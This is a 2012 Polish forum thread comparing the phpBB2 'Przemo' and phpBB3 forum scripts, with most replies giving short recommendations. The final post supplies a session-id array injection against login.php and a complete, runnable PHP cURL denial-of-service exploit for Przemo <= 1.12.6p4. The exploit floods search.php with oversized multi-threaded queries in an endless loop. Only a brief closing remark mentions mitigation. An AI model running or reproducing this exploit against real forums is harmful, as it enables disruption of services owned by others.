freetu 0 Zgłoś post Napisano Maj 27, 2012 (edytowany) Witam, Pytanie: phpbb2 przemo czy phpbb3 Chciałbym poznać opinie na temat tych dwóch skryptów. Zastanawiam się który wybrać do prowadzenia forum serwera counter strike. Chciałbym poczytać opinie pod kątem wydajności, błędów, funkcjonalności i modyfikacji możliwych do wgrania... Sam wiem tyle że przemo nie jest już rozwijany, ale posiada wiele dodatków i wciąż powstają nowe. O phpbb3 nie mam wielu informacji. Czytałem także tą pracę: http://www.blueman.pl/download/pdf/porownanie-wydajnosci-skryptow-forow-internetowych.pdf Jednak nie należy ona do tych aktualnych, dlatego też chcę poznać Wasze opinie Edytowano Maj 27, 2012 przez freetu (zobacz historię edycji) Udostępnij ten post Link to postu Udostępnij na innych stronach
RafoX 233 Zgłoś post Napisano Maj 27, 2012 Witam, Pytanie: phpbb2 przemo czy phpbb3 Chciałbym poznać opinie na temat tych dwóch skryptów. Zastanawiam się który wybrać do prowadzenia forum serwera counter strike. Chciałbym poczytać opinie pod kątem wydajności, błędów, funkcjonalności i modyfikacji możliwych do wgrania... Sam wiem tyle że przemo nie jest już rozwijany, ale posiada wiele dodatków i wciąż powstają nowe. O phpbb3 nie mam wielu informacji. Czytałem także tą pracę: http://www.blueman.p...ternetowych.pdf Jednak nie należy ona do tych aktualnych, dlatego też chcę poznać Wasze opinie PHP BB3 wydajny stabilny i bardziej zabezpieczony od przema Udostępnij ten post Link to postu Udostępnij na innych stronach
IceBeast 30 Zgłoś post Napisano Maj 27, 2012 phpbb3 Udostępnij ten post Link to postu Udostępnij na innych stronach
Łukasz Ostrowski 593 Zgłoś post Napisano Maj 27, 2012 phpbb3 gniecie choćby pod względem optymalizacji przema Sprawdź też Simple Machine i MyBB, wybierz te, którymi będzie Ci się najlepiej posługiwać Udostępnij ten post Link to postu Udostępnij na innych stronach
Artix 34 Zgłoś post Napisano Maj 27, 2012 Oczywiście phpBB3. Jest na pewno bardziej stabilny od przema, dodatkowo cieszy się lepszą opinią wśród internautów ("Przemo jezt dla dzeci Cs!" ~ Jakiś Forumowicz.). No i chyba dysponuje największą ilością skinów oraz bardzo dobrymi polskimi supportami. Udostępnij ten post Link to postu Udostępnij na innych stronach
Miłosz 2311 Zgłoś post Napisano Maj 27, 2012 Zainteresuj się SMF Udostępnij ten post Link to postu Udostępnij na innych stronach
t4t4v4 3 Zgłoś post Napisano Maj 27, 2012 Tylko i wyłącznie phpBB3 Na Przemka istnieje masa explotiów wykorzystujących błędy w wywołaniach do MySQL i łatwo go zatkać. phpBB3 daje Ci zdecydowanie większą szybkość, bezpieczeństwo i łatwość w instalacji szerokiej gamy modyfikacji i szablonów. Udostępnij ten post Link to postu Udostępnij na innych stronach
damtox 0 Zgłoś post Napisano Maj 27, 2012 Jedna i druga wersja jest już tak długo w sieci, że większość poważnych błędów została już załatana... Jak masz do wyboru 2 lub 3 to zawsze wybieraj wersję nowszą, gdyż w większości przypadkach jest to wersja wydajniejsza i bardziej rozbudowana... Ja osobiście polecałbym SMF Udostępnij ten post Link to postu Udostępnij na innych stronach
Kede 31 Zgłoś post Napisano Maj 28, 2012 Wszystko tylko nie phpbb2 przemo Udostępnij ten post Link to postu Udostępnij na innych stronach
Designer 0 Zgłoś post Napisano Maj 30, 2012 Tylko i wyłącznie phpBB3 Na Przemka istnieje masa explotiów wykorzystujących błędy w wywołaniach do MySQL i łatwo go zatkać. phpBB3 daje Ci zdecydowanie większą szybkość, bezpieczeństwo i łatwość w instalacji szerokiej gamy modyfikacji i szablonów. Możesz podać chociaż jeden exploit na aktualną wersję? ) Ja bym wybrał myBB. Udostępnij ten post Link to postu Udostępnij na innych stronach
Macsch 122 Zgłoś post Napisano Maj 31, 2012 phpbb3. Udostępnij ten post Link to postu Udostępnij na innych stronach
Bartek NullTalk.pl 10 Zgłoś post Napisano Czerwiec 1, 2012 Z tych dwóch BB3, jednak głównie polecam MyBB, Udostępnij ten post Link to postu Udostępnij na innych stronach
t4t4v4 3 Zgłoś post Napisano Czerwiec 1, 2012 (edytowany) Możesz podać chociaż jeden exploit na aktualną wersję? ) Ja bym wybrał myBB. Vulnerability in cookie "_sid" and method GET sid: http://example.com/login.php?sid[]= or put to the cookie "_sid": bb8536eb00_sid[]=12345 DoS: <?php ################################################################################ # Exploit Title: phpBB modified by Przemo <= 1.12.6p4 Denial Of Service Exploit1 # # Software phpBB modified by Przemo 1.12.6p4 # Date: 2010-04-29 # Author: GLOBUS # Software Link: http://www.przemo.org/phpBB2/ # Version: <= 1.12.6p4 # category: DoS # # Greetz: hds, Neo, pok3, .xXx., j4ck, revel004, Kopaczka ################################################################################ // cURL and PHP5 function info() { echo "##################################################################\n"; echo "# phpBB modified by Przemo <= 1.12.6p4 Denial Of Service Exploit1\n"; echo "# Author: GLOBUS\n"; echo "# Greetz: hds, Neo, pok3, .xXx., j4ck, revel004, Kopaczka\n"; echo "##################################################################\n"; echo "# php dos.php URL THREADS TIMEOUT\n"; echo "# php dos.php http://www.example.pl/phpbb/ 20 5\n"; echo "##################################################################\n"; exit; } if($argc !== 4 || !preg_match('#^\d+$#', $argv[2]) || !preg_match('#^\d+$#', $argv[3])) { info(); } $url = $argv[1]; $threads = (int) $argv[2]; $timeout = (int) $argv[3]; $ptimeout = $timeout * 100; $packet = implode('+', range(100,999)); while(1) { $m = curl_multi_init(); for($i = 0; $i < $threads; $i++) { $c[$i] = curl_init(); $opts = array ( CURLOPT_URL => $url . 'search.php?mode=results', CURLOPT_USERAGENT => 'Opera/9.80 (Windows NT 5.1; U; pl) Presto/2.5.24 Version/10.52', CURLOPT_ENCODING => 'gzip, deflate', CURLOPT_POST => 1, CURLOPT_POSTFIELDS => 'search_keywords='. $packet .'&search_terms=all&search_author=&search_time=0&search_fields=all&show_results=posts&sort_by=2&sort_dir=DESC&return_chars=-1', CURLOPT_RETURNTRANSFER => 1, CURLOPT_TIMEOUT => $timeout, ); curl_setopt_array($c[$i], $opts); curl_multi_add_handle($m, $c[$i]); } $t = 0; do { curl_multi_exec($m, $r); usleep(100000); $t++; if($t > $ptimeout) { curl_multi_close($m); for($i = 0; $i < $threads; $i++) { curl_close($c[$i]); } break; } } while($r > 0); echo '.'; } ?> Na wersji 1.12.6p4 działały oba a z tego co wiem to najnowsza wersja. Co do DoSa to można go było prosto wyciąć przez nałożenie limitu na MySQL czy nawet banowanie na kilka minut takiego delikwenta, który stosuje generuje tyle żądań. Miłego weekendu! Edytowano Czerwiec 1, 2012 przez Avatat (zobacz historię edycji) Udostępnij ten post Link to postu Udostępnij na innych stronach